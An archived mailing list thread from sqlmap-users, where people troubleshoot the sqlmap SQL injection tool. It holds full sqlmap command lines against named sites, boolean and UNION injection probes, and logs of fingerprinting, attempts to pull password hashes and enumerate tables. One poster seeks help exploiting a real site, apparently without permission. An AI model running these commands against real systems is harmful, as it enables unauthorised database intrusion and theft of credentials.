sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] problem detecting the union count

[Adi M. <adi...@ya...>]

back,

It was my mistake, I was modifyint the log file
incorrectly. But now I have solved it by taking as a model another log
file where sqlmap detected correctly. 

However there is another problem now. Allthough sqlmap detects correctly, when I run some commands it says:

[10:17:59] [INFO] fetching tables
[10:17:59] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind
[10:17:59] [INFO] fetching database names
[10:18:00]
[WARNING] for some reasons it was not possible to retrieve the query
output through inband SQL injection technique, sqlmap is going blind




________________________________
From: Adi Mutu <adi...@ya...>
To: sql...@li...
Sent: Tue, October 13, 2009 7:02:22 AM
Subject: [sqlmap-users] problem detecting the union count



Hello,

Sqlmap fails to detect the no. of columns to use in a union. My guess is that this happens because the input variable is used in a second query, which echoes an error back in the html output. Thus I think sqlmap tries something like Union 12345 # , sees the 12345 echoed back and stops. Is this the behaviour?

Then I tried to modify the log file like this:

[http://www.xxxx.com:80/podcast-detail.php][None][None][Match ratio][0.9]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Injection point][GET]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection parameter][id]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection type][numeric]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Parenthesis][0]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][SELECT 12345,222,333,444,555 FROM information_schema.TABLES LIMIT 0, 1][12345]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][DBMS][MySQL 5]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Union comment][#]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Union count][5]


As you can see there are 5 columns in the query and the output should be in the first column. Did i modified it correctly? 
And also when I try to resume from this file with -s option it goes back to the old behaviour, which uses 1 column for unin, not 5 as I have tried to tell it to do.

Thank you!


      

[sqlmap-users] problem detecting the union count

[Adi M. <adi...@ya...>]

Hello,

Sqlmap fails to detect the no. of columns to use in a union. My guess is that this happens because the input variable is used in a second query, which echoes an error back in the html output. Thus I think sqlmap tries something like Union 12345 # , sees the 12345 echoed back and stops. Is this the behaviour?

Then I tried to modify the log file like this:

[http://www.xxxx.com:80/podcast-detail.php][None][None][Match ratio][0.9]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Injection point][GET]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection parameter][id]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection type][numeric]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Parenthesis][0]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][SELECT 12345,222,333,444,555 FROM information_schema.TABLES LIMIT 0, 1][12345]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][DBMS][MySQL 5]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Union comment][#]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Union count][5]


As you can see there are 5 columns in the query and the output should be in the first column. Did i modified it correctly? 
And also when I try to resume from this file with -s option it goes back to the old behaviour, which uses 1 column for unin, not 5 as I have tried to tell it to do.

Thank you!



      

[sqlmap-users] unhandled exception in sqlmap/0.7

[Windom E. <win...@ma...>]

While doing cookie parameter injection for "--dump-all" option...

Error log:

there were multiple injection points, please select the one to use to go ahead:
[0] place: User-Agent, parameter: User-Agent, type: numeric (default)
[1] place: Cookie, parameter: sessiondata, type: numeric
[q] Quit
> 1
[17:35:50] [INFO] testing for parenthesis on injectable parameter
[17:36:51] [INFO] the injectable parameter requires 3 parenthesis
[17:36:52] [INFO] testing MySQL
[17:37:12] [WARNING] the back-end DMBS is not MySQL
[17:37:12] [INFO] testing Oracle
[17:37:32] [WARNING] the back-end DMBS is not Oracle
[17:37:32] [INFO] testing PostgreSQL
[17:37:54] [WARNING] the back-end DMBS is not PostgreSQL
[17:37:54] [INFO] testing Microsoft SQL Server
[17:38:17] [INFO] confirming Microsoft SQL Server
[17:38:40] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: Microsoft SQL Server 2000

[17:38:40] [INFO] fetching tables
[17:38:40] [INFO] fetching database names
[17:38:40] [INFO] fetching number of databases
[17:38:40] [INFO] retrieved: [17:38:40] [ERROR] unhandled exception in sqlmap/0.
7, please copy the command line and the following text and send by e-mail to sql
map...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.1
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 120, in action
  File "plugins\generic\enumeration.pyc", line 1081, in dumpAll
  File "plugins\dbms\mssqlserver.pyc", line 337, in getTables
  File "plugins\generic\enumeration.pyc", line 661, in getDbs
  File "lib\request\inject.pyc", line 378, in getValue
  File "lib\request\inject.pyc", line 308, in __goInferenceProxy
  File "lib\request\inject.pyc", line 99, in __goInferenceFields
  File "lib\request\inject.pyc", line 58, in __goInference
  File "lib\techniques\blind\inference.pyc", line 232, in bisection
  File "lib\techniques\blind\inference.pyc", line 105, in getChar
TypeError: not all arguments converted during string formatting

Re: [sqlmap-users] problem using --passwords option

[Bernardo D. A. G. <ber...@gm...>]

It seems that the user 'fmcgman' has not access to read the 'mysql'
system database.

On Mon, Oct 5, 2009 at 06:59, Adi Mutu <adi...@ya...> wrote:
>
> This is the output I got:
>
> [08:54:02] [INFO] resuming match ratio '0.9' from session file
> [08:54:02] [INFO] resuming injection point 'GET' from session file
> [08:54:02] [INFO] resuming injection parameter 'id' from session file
> [08:54:02] [INFO] resuming injection type 'numeric' from session file
> [08:54:02] [INFO] resuming 0 number of parenthesis from session file
> [08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [08:54:02] [INFO] resuming union comment '#' from session file
> [08:54:02] [INFO] resuming union count 9 from session file
> [08:54:02] [INFO] resuming union position 4 from session file
> [08:54:02] [INFO] testing connection to the target url
> [08:54:02] [WARNING] the testable parameter 'id' you provided is not into
> the Cookie
> [08:54:02] [INFO] testing for parenthesis on injectable parameter
> [08:54:02] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Red Hat
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5
> [08:54:02] [INFO] fetching database users password hashes
> [08:54:03] [WARNING] for some reasons it was not possible to retrieve the
> query output through inband SQL injection technique, sqlmap is going bli
> [08:54:03] [INFO] fetching database users
> [08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
> [08:54:03] [INFO] fetching number of password hashes for user '''
> [08:54:03] [ERROR] Unenclosed ' in 'SELECT
> IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM
> mysql.user WHERE user=CHAR()''
> [*] shutting down at: 08:54:03
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry® Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9-12, 2009. Register now!
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] problem using --passwords option

[Adi M. <adi...@ya...>]

This is the output I got:

[08:54:02] [INFO] resuming match ratio '0.9' from session file
[08:54:02] [INFO] resuming injection point 'GET' from session file
[08:54:02] [INFO] resuming injection parameter 'id' from session file
[08:54:02] [INFO] resuming injection type 'numeric' from session file
[08:54:02] [INFO] resuming 0 number of parenthesis from session file
[08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:54:02] [INFO] resuming union comment '#' from session file
[08:54:02] [INFO] resuming union count 9 from session file
[08:54:02] [INFO] resuming union position 4 from session file
[08:54:02] [INFO] testing connection to the target url
[08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[08:54:02] [INFO] testing for parenthesis on injectable parameter
[08:54:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
[08:54:02] [INFO] fetching database users password hashes
[08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli
[08:54:03] [INFO] fetching database users
[08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
[08:54:03] [INFO] fetching number of password hashes for user '''
[08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()''
[*] shutting down at: 08:54:03


      

[sqlmap-users] Mysql 4, information schema, and sql-shell

[Kyle A. <ky...@xk...>]

So it seems that you cannot do a --dump-all on a mysql 4 server
because information_schema is not available.

But can't I just do a "show databases;" in a sql shell? I tried but I
can't seem to get the sql-shell to work (probably because it says I'm
not a DBA)

Can someone explain a little more about this? (Or link me)

Kyle

[sqlmap-users] Expanding the control over the operating system from the database

[Bernardo D. A. G. <ber...@gm...>]

Hi,

On Tuesday I came back from Barcelona (Spain) where I gave a talk[1]
with my friend Guido Landi[2] at SOURCE Conference 2009[3], met some
very smart people, had good chats, fun times too and ate amazing
spanish tapas with tasty local red wine!

Thanks SOURCE Barcelona 2009 team[4] for organizing such a great event
and giving me the opportunity to come over!

My presentation slides are online[5] on Slideshare. You can also read
them below.

I also released sqlmap 0.8 release candidate 1 with all of the new
features described during my presentation at the Conference. You can
also checkout the source code from the sqlmap Subversion repository:

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ sqlmap

[1] http://bernardodamele.blogspot.com/2009/09/source-barcelona-2009.html
[2] http://www.pornosecurity.org/
[3] http://www.sourceconference.com/index.php/source-barcelona-2009
[4] http://www.sourceconference.com/index.php/source-barcelona-2009/barc-2009-team
[5] http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Blind injection possible - no output

[Erik N. <da...@gm...>]

Thank you for your answer,
unfortunately it didn't help me.

I tried to force the back-end dbms into a number of different variations.
I also double checked that the string isn't present when using AND 1=2.

Using --fingerprint gave me no output as well. This is what I got from that run:

[19:28:54] [WARNING] the testable parameter 'id' you provided is not
into the Cookie
[19:28:54] [INFO] testing connection to the target url
[19:28:58] [INFO] testing if the provided string is within the target
URL page content
[19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
[19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[19:29:04] [INFO] testing for parenthesis on injectable parameter
[19:29:07] [INFO] the injectable parameter requires 0 parenthesis
[19:29:07] [INFO] the back-end DBMS is MySQL
[19:29:07] [INFO] testing MySQL
[19:29:13] [INFO] confirming MySQL
[19:29:17] [INFO] retrieved:
[19:29:25] [INFO] the back-end DBMS is MySQL
[19:29:25] [INFO] retrieved:
[19:29:34] [INFO] retrieved:
[19:29:43] [INFO] retrieved:
[19:29:49] [INFO] retrieved:
[19:29:59] [INFO] retrieved:
[19:30:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
               comment injection fingerprint: MySQL 5.0.75


[*] shutting down at: 19:32:09

On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G.
<ber...@gm...> wrote:
> Hi Erik,
>
> Try to force the back-end database software and version manually if
> you know it, e.g. --dbms "mysql 5" and double check that the provided
> string to match on is not present within any False response (eg. AND
> 1=2).
>
> Cheers,
> Bernardo
>
>
> On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --fingerprint
>>
>> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
>> with 0 parenthesis
>> [14:09:04] [INFO] testing for parenthesis on injectable parameter
>> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
>> [14:09:06] [INFO] testing MySQL
>> [14:09:07] [INFO] confirming MySQL
>> [14:09:08] [INFO] retrieved:
>> [14:09:10] [INFO] the back-end DBMS is MySQL
>> [14:09:10] [INFO] retrieved:
>> [14:11:28] [INFO] retrieved:
>> [14:11:32] [INFO] retrieved:
>> [14:11:35] [INFO] retrieved:
>> [14:11:41] [INFO] retrieved:
>> [14:11:46] [INFO] executing MySQL comment injection fingerprint
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: active fingerprint: MySQL < 3.22.11
>>               comment injection fingerprint: MySQL 5.0.75
>>
>>
>> [*] shutting down at: 14:12:50
>>
>>
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --current-db
>>
>> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
>> nthesis
>> [14:14:01] [INFO] testing for parenthesis on injectable parameter
>> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
>> [14:14:03] [INFO] testing MySQL
>> [14:14:04] [INFO] confirming MySQL
>> [14:14:05] [INFO] retrieved:
>> [14:14:07] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: MySQL < 5.0.0
>>
>> [14:14:07] [INFO] fetching current database
>> [14:14:07] [INFO] retrieved:
>> current database:       None
>>
>>
>> What to do?
>>
>> ------------------------------------------------------------------------------
>> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
>> trial. Simplify your report design, integration and deployment - and focus on
>> what you do best, core application coding. Discover what's new with
>> Crystal Reports now.  http://p.sf.net/sfu/bobj-july
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>

Re: [sqlmap-users] Basic injection not working... Help.

[Bernardo D. A. G. <ber...@gm...>]

Hi Tristan,

I said AND 1=1 and AND 1=2. sqlmap does this test. It does not do AND
1 nor AND 0.
By the way, the detection phase in sqlmap is in process to be totally
rewritten because at this time it misses many cases.

Cheers,
Bernardo


On Thu, Sep 17, 2009 at 17:49, Tristan Foureur
<tri...@gm...> wrote:
> Hi bernardo,
>
> Thanks for your reply,
>
> Yes, I'm allowed to test this website. Hmm... I don't understand that such a
> complex program doesn't find this parameter vulnerable, cause it DO works
> with AND 1 and it DOESNT work with AND 0.
>
> I will also try to use the --string option.


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Blind injection possible - no output

[Bernardo D. A. G. <ber...@gm...>]

Hi Erik,

Try to force the back-end database software and version manually if
you know it, e.g. --dbms "mysql 5" and double check that the provided
string to match on is not present within any False response (eg. AND
1=2).

Cheers,
Bernardo


On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
> __utmb=107765125.29.10.1252406202; __utmc=107765125;
> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
> --string="Secret Forum" --fingerprint
>
> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
> with 0 parenthesis
> [14:09:04] [INFO] testing for parenthesis on injectable parameter
> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
> [14:09:06] [INFO] testing MySQL
> [14:09:07] [INFO] confirming MySQL
> [14:09:08] [INFO] retrieved:
> [14:09:10] [INFO] the back-end DBMS is MySQL
> [14:09:10] [INFO] retrieved:
> [14:11:28] [INFO] retrieved:
> [14:11:32] [INFO] retrieved:
> [14:11:35] [INFO] retrieved:
> [14:11:41] [INFO] retrieved:
> [14:11:46] [INFO] executing MySQL comment injection fingerprint
> web server operating system: Linux Ubuntu
> web application technology: PHP 5.2.6, Apache
> back-end DBMS: active fingerprint: MySQL < 3.22.11
>               comment injection fingerprint: MySQL 5.0.75
>
>
> [*] shutting down at: 14:12:50
>
>
> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
> __utmb=107765125.29.10.1252406202; __utmc=107765125;
> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
> --string="Secret Forum" --current-db
>
> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
> nthesis
> [14:14:01] [INFO] testing for parenthesis on injectable parameter
> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
> [14:14:03] [INFO] testing MySQL
> [14:14:04] [INFO] confirming MySQL
> [14:14:05] [INFO] retrieved:
> [14:14:07] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: PHP 5.2.6, Apache
> back-end DBMS: MySQL < 5.0.0
>
> [14:14:07] [INFO] fetching current database
> [14:14:07] [INFO] retrieved:
> current database:       None
>
>
> What to do?
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus on
> what you do best, core application coding. Discover what's new with
> Crystal Reports now.  http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Basic injection not working... Help.

[Bernardo D. A. G. <ber...@gm...>]

Hi Tristan,

First of all, are you allowed to test that url? If you are, could you
please try manually be injecting AND 3=3 to the news_id parameter
first and AND 3=4 later and see if the result is as expected.

During the detection phase, sqlmap tries to identify injectable
parameters only via AND, never via OR, for a few reasons highlighted
some months back on this mailing list. This is the reason why, for the
moment, sqlmap does not detect zone_id as an injectable parameter.

Also, try to provide to sqlmap a string (--string option) or a regular
expression (Python compliant) to match on, refer to the user's manual
for details.

Cheers,
Bernardo


On Thu, Sep 17, 2009 at 17:04, Tristan Foureur
<tri...@gm...> wrote:
> ...
> It says that both news_id and zone_id aren't injectables ! I tried using the
> -p parameter like that : -p zone_id but it doesn't change anything.
>
> I don't think that sqlmap can't detect such basic injections, so could you
> tell me what is the proper parameters to detect something simple like that,
> and then how to exploit it ?

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Basic injection not working... Help.

[Kyle A. <ky...@xk...>]

He may be busted :)  But this seems like a bug report really. And how
can one allow a developer to reproduce the bug without providing steps
to reproduce it? I also can't get sqlmap to identify any injectable
variables.
Kyle

On 9/17/09, Erik Nilsson <da...@gm...> wrote:
> LOL!
>
> On Thu, Sep 17, 2009 at 6:10 PM, Ryan Dewhurst <rya...@gm...>
> wrote:
>> Busted!
>>
>> 2009/9/17 Patrick Webster <pa...@au...>:
>>> It is probably not a good idea to attack http://www.siig.fr
>>>
>>> -Patrick
>>>
>>> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur
>>> <tri...@gm...>
>>> wrote:
>>>>
>>>> Hello,
>>>>
>>>> I don't know why but a really really basic injection is not detected.
>>>> The
>>>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>>>
>>>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>>>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>>>> THISISATEST it displays a mysql error.
>>>>
>>>> So it's definitely injectable and that's not a "rare" type of injection.
>>>>
>>>> Now I would like to learn to use sqlmap to find these injections and how
>>>> to use it but when I'm doing this :
>>>>
>>>> sqlmap.exe -u
>>>> "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4"
>>>> -v 1
>>>>
>>>> It says that both news_id and zone_id aren't injectables ! I tried using
>>>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>>>
>>>> I don't think that sqlmap can't detect such basic injections, so could
>>>> you
>>>> tell me what is the proper parameters to detect something simple like
>>>> that,
>>>> and then how to exploit it ?
>>>>
>>>> Thanks :)
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>>>> is the only developer event you need to attend this year. Jumpstart your
>>>> developing skills, take BlackBerry mobile applications to market and
>>>> stay
>>>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>>>> now&#33;
>>>> http://p.sf.net/sfu/devconf
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>>> is the only developer event you need to attend this year. Jumpstart your
>>> developing skills, take BlackBerry mobile applications to market and stay
>>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>>> now&#33;
>>> http://p.sf.net/sfu/devconf
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>> ------------------------------------------------------------------------------
>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> is the only developer event you need to attend this year. Jumpstart your
>> developing skills, take BlackBerry mobile applications to market and stay
>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>> now&#33;
>> http://p.sf.net/sfu/devconf
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] Need some help with a basic vulnerability

[Tristan F. <tri...@gm...>]

Hello,

I don't know why but a really really basic injection is not detected. The
URL is like www.host.com?news_id=270&zone_id=4<http://www.host.com/?news_id=270&zone_id=4>and
when I'm doing

www.host.com?news_id=270&zone_id=4<http://www.host.com/?news_id=270&zone_id=4>OR
1 it displays every news, when I'm doing news_id=270 AND 0 it displays
no
news. When I'm doing news_id=270 THISISATEST it displays a mysql error.

So it's definitely injectable and that's not a "rare" type of injection.

Now I would like to learn to use sqlmap to find these injections and how to
use it but when I'm doing this :

sqlmap.exe -u "http://www.host.com/news.php?news_id=270&zone_id=4<http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4>"
-v 1

It says that both news_id and zone_id aren't injectables ! I tried using the
-p parameter like that : -p zone_id but it doesn't change anything.

I don't think that sqlmap can't detect such basic injections, so could you
tell me what are the proper parameters to detect something simple like that
?

Thanks :)

Re: [sqlmap-users] Fwd: Fwd: sqlmap stop after testing User-Agent

[Kyle A. <ky...@xk...>]

I don't really want to spoil this challenge for you, I enjoy
hackthissite.org and I hate spoilers. But the URL you are attacking is
incorrect, connexion.php doesn't accept post data at all. Look
carefully at the source.

Also look again at the variables you are passing, one of them is not correct.

Also, this tool may not work on a hacking site, if it is anything like
hackthissite.org. The reason is that for safety purposes, the site may
be hardcoded to only accept the official "response" and won't respond
like a normal php/mysql site. Does this make any sense? In other
words, the php page may just be parsing for correct looking responses,
not really a database behind it? I tried injecting it with the correct
url and correct variables and it didn't respond, I don't believe that
a real mysql server is behind it.

Kyle

On 9/16/09, Adrien LEMAIRE <lem...@gm...> wrote:
> your exemple was user and password. I've looked into tamper data and have
> seen that variables were user and pass. So what do you think about it ?
>
> Thank you a lot for your help, Erik !
>
> On Wed, Sep 16, 2009 at 2:10 PM, Erik Nilsson <da...@gm...> wrote:
>
>> This was just an example of variables to use. You have to identify the
>> variables by your own for each url.
>> A good tool for this is the "Tamper data" plug in for Firefox.
>>
>>
>>
>>
>> ---------- Forwarded message ----------
>> From: Adrien LEMAIRE <lem...@gm...>
>> Date: Wed, Sep 16, 2009 at 1:52 PM
>> Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
>> To: Erik Nilsson <da...@gm...>
>> Cc: sql...@li...
>>
>>
>> Ok, I have already tried with --data option, but I've put
>> "user=user;pass=pass" instead of "user=user&pass=pass", mistake.
>>
>> So I've retried and the output is :
>>
>> > $ python sqlmap.py -u
>> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>> --data="user=user&pass=password"
>> >
>> >     sqlmap/0.7
>> >     by Bernardo Damele A. G. <ber...@gm...>
>> >
>> > [*] starting at: 13:43:07
>> >
>> > [13:43:07] [INFO] testing connection to the target url
>> > [13:43:07] [INFO] testing if the url is stable, wait a few seconds
>> > [13:43:08] [INFO] url is stable
>> > [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
>> > [13:43:08] [WARNING] POST parameter 'user' is not dynamic
>> > [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
>> > [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
>> > [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is
>> > dynamic
>> > [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> >
>> > [*] shutting down at: 13:43:08
>>
>>
>> So I suppose that there is no injection vulnerability, and I should
>> use another tool ?
>>
>>
>>
>>
>>
>>
>>
>> On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
>> >
>> > You'll need to enter GET and/or POST values like
>> >
>> > sqlmap-0.7 $ python sqlmap.py -u
>> > http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>> > --data="user=user&password=password"
>> >
>> > OR
>> >
>> > sqlmap-0.7 $ python sqlmap.py
>> > --url="
>> http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>> >
>> > ---------- Forwarded message ----------
>> > From: Adrien LEMAIRE <lem...@gm...>
>> > Date: Wed, Sep 16, 2009 at 11:35 AM
>> > Subject: [sqlmap-users] sqlmap stop after testing User-Agent
>> > To: sql...@li...
>> >
>> >
>> > Hi everyone,
>> >
>> > I'm new to this list mail :)
>> > I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
>> > and tried to launch it :
>> >
>> > >  sqlmap-0.7 $ python sqlmap.py -u
>> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>> > >
>> > >     sqlmap/0.7
>> > >     by Bernardo Damele A. G. <ber...@gm...>
>> > >
>> > > [*] starting at: 11:13:17
>> > >
>> > > [11:13:17] [INFO] testing connection to the target url
>> > > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
>> > > [11:13:19] [INFO] url is stable
>> > > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is
>> dynamic
>> > > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> > >
>> > > [*] shutting down at: 11:13:19
>> >
>> > This website is a french site for hacking challenges, and I wanted to
>> > try if sqlmap couldn't bruteforce the login/password.
>> > But I thought that sqlmap will also test for GET, POST and Cookie
>> > before shutting down if nothing is dynamic.
>> >
>> > Reference to user manual :
>> > >
>> > > Let's say that you are auditing a web application and found a web page
>> that accepts dynamic user-provided values on GET or POST parameters or
>> HTTP
>> Cookie values or HTTP User-Agent header value.
>> >
>> >
>> > Did I misunderstood something ? Do you think I forgot to configure
>> > something in sqlmap config files ? (I havn't modified any file yet).
>> >
>> > Thank you a lot for your answer, and sorry for disturb..
>> > Best regards,
>> > Adrien Lemaire
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> > is the only developer event you need to attend this year. Jumpstart your
>> > developing skills, take BlackBerry mobile applications to market and
>> > stay
>> > ahead of the curve. Join us from November 9&#45;12, 2009. Register
>> now&#33;
>> > http://p.sf.net/sfu/devconf
>> > _______________________________________________
>> > sqlmap-users mailing list
